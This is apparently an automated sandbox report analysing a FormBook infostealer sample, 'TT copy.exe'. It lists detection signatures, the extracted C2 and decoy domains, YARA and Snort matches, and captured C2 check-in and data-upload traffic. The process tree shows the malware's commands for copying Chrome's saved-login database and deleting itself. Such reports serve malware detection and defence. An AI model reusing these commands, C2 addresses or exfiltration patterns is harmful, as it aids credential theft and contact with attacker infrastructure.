Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TT copy.exe

Overview

General Information

Sample Name:TT copy.exe
Analysis ID:638587
MD5:6443c909d7e8034f945f3e1dc138a046
SHA1:a8a4d0653f3598cd477e5887cf12b3ed33625898
SHA256:de1caed83e7085b2ee79d77ea41b9cfa079182680e7db2c1a8d3cedbc2ac2676
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Self deletion via cmd or bat file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TT copy.exe (PID: 1800 cmdline: "C:\Users\user\Desktop\TT copy.exe" MD5: 6443C909D7E8034F945F3E1DC138A046)
    • TT copy.exe (PID: 1388 cmdline: C:\Users\user\Desktop\TT copy.exe MD5: 6443C909D7E8034F945F3E1DC138A046)
      • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 3800 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 1448 cmdline: /c del "C:\Users\user\Desktop\TT copy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5224 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.drivetrianrepair.com/umat/"], "decoy": ["hochanationlive.com", "oreillypresent.com", "ineedmoretape.com", "hulftegg.com", "erpel.xyz", "bocaimvip.com", "1803bragg.com", "novamercado.online", "medonlinestore.com", "lizishuju.com", "408wmountain.info", "pixelperfect.biz", "vacuumsforvets.com", "aurelioperezsellsgilroy.com", "vinhmedialife.com", "bani-pe-pilot-automat.com", "sarrafguler.com", "joaorenato.com", "blazeoficial.online", "huiyi-sui.com", "terminer.xyz", "wealthuon.com", "vitamixn.com", "sinsegae.net", "elsiehull.com", "shihetian.com", "petrascoaching.online", "dramaelaboration.top", "notariatresmatehuala.com", "theflysnare.com", "jxzoe.com", "toscot.land", "pheife.com", "homilas.com", "dunkefy.com", "weichie.biz", "asalahgroup.com", "ggoomal.com", "mattav.com", "phinisicoffee.com", "missioncriticalbiz.com", "ctleurope.net", "franciscojunior.net", "huayugw.com", "righthandclaims.com", "ketooxocefat.xyz", "shopcycles3.com", "moiecaten.com", "sassafrasriver.info", "titanastrology.com", "sofasshoppri.com", "smzy.club", "vapodistri.xyz", "totallogamsolusi.com", "airvataus.com", "renyposh.com", "vinicimes.pro", "internet-sichrheit.com", "hucaxiwid.site", "alexandrathunecke.com", "wanyituan001.com", "performanceleads.online", "thegreatpartyvenue.com", "teknodijitalmatbaa.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.287883851.0000000002983000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8c18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8fb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x16355:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15e01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x16457:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x165cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x99ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1507c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa742:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b997:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 32 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.0.TT copy.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.TT copy.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7e18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x81b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15555:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15001:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15657:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x157cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x8bca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1427c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9942:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.0.TT copy.exe.400000.6.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a19:$sqlite3step: 68 34 1C 7B E1
          • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a48:$sqlite3text: 68 38 2A 90 C5
          • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
          3.0.TT copy.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            3.0.TT copy.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x7e18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x81b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x15555:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x15001:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x15657:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x157cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x8bca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1427c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9942:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1ab97:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 24 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.418.193.36.15349786802031453 06/03/22-08:17:26.941837
            SID:2031453
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4154.36.145.11049893802031412 06/03/22-08:19:23.968199
            SID:2031412
            Source Port:49893
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4185.254.241.17349780802031453 06/03/22-08:16:58.893159
            SID:2031453
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4185.254.241.17349780802031412 06/03/22-08:16:58.893159
            SID:2031412
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.418.193.36.15349786802031412 06/03/22-08:17:26.941837
            SID:2031412
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4154.36.145.11049893802031453 06/03/22-08:19:23.968199
            SID:2031453
            Source Port:49893
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.434.102.136.18049896802031453 06/03/22-08:19:29.232565
            SID:2031453
            Source Port:49896
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.434.102.136.18049896802031412 06/03/22-08:19:29.232565
            SID:2031412
            Source Port:49896
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4185.254.241.17349780802031449 06/03/22-08:16:58.893159
            SID:2031449
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.418.193.36.15349786802031449 06/03/22-08:17:26.941837
            SID:2031449
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.434.102.136.18049896802031449 06/03/22-08:19:29.232565
            SID:2031449
            Source Port:49896
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4154.36.145.11049893802031449 06/03/22-08:19:23.968199
            SID:2031449
            Source Port:49893
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.drivetrianrepair.com/umat/"], "decoy": ["hochanationlive.com", "oreillypresent.com", "ineedmoretape.com", "hulftegg.com", "erpel.xyz", "bocaimvip.com", "1803bragg.com", "novamercado.online", "medonlinestore.com", "lizishuju.com", "408wmountain.info", "pixelperfect.biz", "vacuumsforvets.com", "aurelioperezsellsgilroy.com", "vinhmedialife.com", "bani-pe-pilot-automat.com", "sarrafguler.com", "joaorenato.com", "blazeoficial.online", "huiyi-sui.com", "terminer.xyz", "wealthuon.com", "vitamixn.com", "sinsegae.net", "elsiehull.com", "shihetian.com", "petrascoaching.online", "dramaelaboration.top", "notariatresmatehuala.com", "theflysnare.com", "jxzoe.com", "toscot.land", "pheife.com", "homilas.com", "dunkefy.com", "weichie.biz", "asalahgroup.com", "ggoomal.com", "mattav.com", "phinisicoffee.com", "missioncriticalbiz.com", "ctleurope.net", "franciscojunior.net", "huayugw.com", "righthandclaims.com", "ketooxocefat.xyz", "shopcycles3.com", "moiecaten.com", "sassafrasriver.info", "titanastrology.com", "sofasshoppri.com", "smzy.club", "vapodistri.xyz", "totallogamsolusi.com", "airvataus.com", "renyposh.com", "vinicimes.pro", "internet-sichrheit.com", "hucaxiwid.site", "alexandrathunecke.com", "wanyituan001.com", "performanceleads.online", "thegreatpartyvenue.com", "teknodijitalmatbaa.xyz"]}
            Multi AV Scanner detection for submitted file
            Source: TT copy.exeVirustotal: Detection: 34%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Antivirus / Scanner detection for submitted sample
            Source: TT copy.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.drivetrianrepair.com/umat/?bT7tPLpx=mirGcuiLmtPKrDRAwzy9R4FSSMfuwOXiEO9Msa/shEoIjA842HTgawjSFBDstolWxD5R&Lls=MzrpAvira URL Cloud: Label: malware
            Source: http://www.sinsegae.net/umat/?bT7tPLpx=D4TTb2HFoQH2akGSEaIGW9Q5orhATJxj88Hz932hPvAyMJtUsfmLZeVWMqqycYkj367i&Lls=MzrpAvira URL Cloud: Label: malware
            Source: http://www.drivetrianrepair.com/umat/Avira URL Cloud: Label: malware
            Source: http://www.shopcycles3.com/umat/?bT7tPLpx=fN7N1F2KWXt3ovU6r68cyY5Lu6wYlX1654ZBQHzs5x7zh69UEoWjTQ+z2V8zkyyJbLkO&Lls=MzrpAvira URL Cloud: Label: malware
            Source: http://www.huiyi-sui.com/umat/?bT7tPLpx=0U+wDcNGQqR9Hew/M/CPYn8/YjXw+pI3fQmmix2gP7IpZmdQ6xwgfERw2ruDncdGOHrq&Lls=MzrpAvira URL Cloud: Label: malware
            Source: http://www.huiyi-sui.com/umat/Avira URL Cloud: Label: malware
            Source: www.drivetrianrepair.com/umat/Avira URL Cloud: Label: malware
            Machine Learning detection for sample
            Source: TT copy.exeJoe Sandbox ML: detected
            Source: 3.0.TT copy.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.TT copy.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.TT copy.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.2.TT copy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: TT copy.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: TT copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: StreamingContextSta.pdb source: TT copy.exe
            Source: Binary string: wntdll.pdbUGP source: TT copy.exe, 00000003.00000002.358699164.000000000115F000.00000040.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.277558771.0000000000D05000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.283452054.0000000000EA1000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.359728114.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.352750637.0000000004E4D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: TT copy.exe, TT copy.exe, 00000003.00000002.358699164.000000000115F000.00000040.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.277558771.0000000000D05000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.283452054.0000000000EA1000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000003.359728114.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.352750637.0000000004E4D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: TT copy.exe, 00000003.00000002.358458771.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: TT copy.exe, 00000003.00000002.358458771.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F41670 FindFirstFileW,FindNextFileW,FindClose,15_2_00F41670
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4166B FindFirstFileW,FindNextFileW,FindClose,15_2_00F4166B

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 107.187.232.173 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.huiyi-sui.com
            Source: C:\Windows\explorer.exeDomain query: www.sarrafguler.com
            Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 18.193.36.153 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.130 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 198.44.241.20 80Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 172.16.0.13 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 154.36.145.110 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.pheife.com
            Source: C:\Windows\explorer.exeDomain query: www.sassafrasriver.info
            Source: C:\Windows\explorer.exeNetwork Connect: 185.254.241.173 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.drivetrianrepair.com
            Source: C:\Windows\explorer.exeDomain query: www.theflysnare.com
            Source: C:\Windows\explorer.exeNetwork Connect: 162.213.255.237 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.408wmountain.info
            Source: C:\Windows\explorer.exeDomain query: www.shopcycles3.com
            Source: C:\Windows\explorer.exeDomain query: www.sinsegae.net
            Source: C:\Windows\explorer.exeDomain query: www.huayugw.com
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 185.254.241.173:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 185.254.241.173:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 185.254.241.173:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49786 -> 18.193.36.153:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49786 -> 18.193.36.153:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49786 -> 18.193.36.153:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49893 -> 154.36.145.110:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49893 -> 154.36.145.110:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49893 -> 154.36.145.110:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 34.102.136.180:80
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: www.drivetrianrepair.com/umat/
            Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=D4TTb2HFoQH2akGSEaIGW9Q5orhATJxj88Hz932hPvAyMJtUsfmLZeVWMqqycYkj367i&Lls=Mzrp HTTP/1.1Host: www.sinsegae.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=fN7N1F2KWXt3ovU6r68cyY5Lu6wYlX1654ZBQHzs5x7zh69UEoWjTQ+z2V8zkyyJbLkO&Lls=Mzrp HTTP/1.1Host: www.shopcycles3.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=mirGcuiLmtPKrDRAwzy9R4FSSMfuwOXiEO9Msa/shEoIjA842HTgawjSFBDstolWxD5R&Lls=Mzrp HTTP/1.1Host: www.drivetrianrepair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2Ti+o1fqk+Bj&Lls=Mzrp HTTP/1.1Host: www.408wmountain.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=0U+wDcNGQqR9Hew/M/CPYn8/YjXw+pI3fQmmix2gP7IpZmdQ6xwgfERw2ruDncdGOHrq&Lls=Mzrp HTTP/1.1Host: www.huiyi-sui.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=FnqEmG0l+4J7qDB1yrHJ8vmLGr/EIrLpN16t5uGcZtfyOUhwcz0qzKS8JKDk7Sjhqw7U&Lls=Mzrp HTTP/1.1Host: www.sarrafguler.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=KCFtk2ByPIrj6EQbanamrSzf2WMHsV3o1++x6ahF6LksDSy9FlqjvwWpWYTFvIM6F0DF&Lls=Mzrp HTTP/1.1Host: www.theflysnare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=2PPXS0ByghwnUiXofzfHcTluxn0kF7CQXUmv2gLgzHNDwPHvxa5MhM39jfYs7JtQ10qs&Lls=Mzrp HTTP/1.1Host: www.huayugw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.drivetrianrepair.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.drivetrianrepair.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drivetrianrepair.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 70 67 66 38 43 4b 6a 36 75 4e 4c 43 78 45 49 77 6d 33 37 62 45 4e 56 58 59 35 7a 69 79 4b 58 4f 55 37 31 45 31 36 76 6a 6e 6e 59 49 6f 78 67 44 28 69 6a 30 52 31 57 38 56 7a 4c 74 33 4d 52 46 74 44 49 2d 54 76 43 79 4c 5a 32 64 4e 42 4b 79 69 4e 28 31 38 5f 53 31 46 31 50 58 53 69 7e 41 72 58 6e 4f 52 48 42 34 54 2d 6d 71 44 6f 33 69 34 46 4d 4b 53 44 39 34 6c 50 54 71 70 54 4d 7a 4b 79 70 41 30 31 70 73 39 74 56 43 42 2d 43 74 43 56 74 6c 78 79 48 4b 63 79 6b 63 31 59 37 63 57 36 46 35 35 33 36 75 42 37 45 61 33 6b 6c 77 77 53 66 38 47 46 75 75 4f 66 43 77 78 41 45 61 73 77 62 50 6f 53 49 69 39 53 55 56 4a 42 74 36 7e 31 36 37 30 31 4c 53 71 4d 53 4e 4d 57 6d 47 6e 6b 76 5a 34 44 65 59 38 66 31 63 4f 38 61 44 62 43 4e 37 5a 53 4e 53 78 61 41 66 49 66 49 78 36 43 56 77 30 74 72 76 66 4b 6e 36 73 68 59 35 45 6f 69 74 75 70 41 62 4a 78 35 67 70 64 45 45 73 44 73 45 79 4e 55 47 42 35 4b 6d 4b 67 48 4d 6b 6d 7e 6f 70 72 71 59 39 4a 57 36 69 76 6c 45 35 53 50 46 68 76 47 54 31 49 46 53 56 48 51 68 66 63 35 72 52 4c 64 59 55 72 79 52 63 7a 57 59 41 32 6e 59 4b 37 55 43 4b 4d 37 44 45 62 55 78 57 36 54 71 50 5f 28 37 41 41 73 46 46 6d 7e 53 75 55 39 5f 64 6d 62 4c 72 62 62 6e 48 67 4d 4e 32 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bT7tPLpx=pgf8CKj6uNLCxEIwm37bENVXY5ziyKXOU71E16vjnnYIoxgD(ij0R1W8VzLt3MRFtDI-TvCyLZ2dNBKyiN(18_S1F1PXSi~ArXnORHB4T-mqDo3i4FMKSD94lPTqpTMzKypA01ps9tVCB-CtCVtlxyHKcykc1Y7cW6F5536uB7Ea3klwwSf8GFuuOfCwxAEaswbPoSIi9SUVJBt6~16701LSqMSNMWmGnkvZ4DeY8f1cO8aDbCN7ZSNSxaAfIfIx6CVw0trvfKn6shY5EoitupAbJx5gpdEEsDsEyNUGB5KmKgHMkm~oprqY9JW6ivlE5SPFhvGT1IFSVHQhfc5rRLdYUryRczWYA2nYK7UCKM7DEbUxW6TqP_(7AAsFFm~SuU9_dmbLrbbnHgMN2Q).
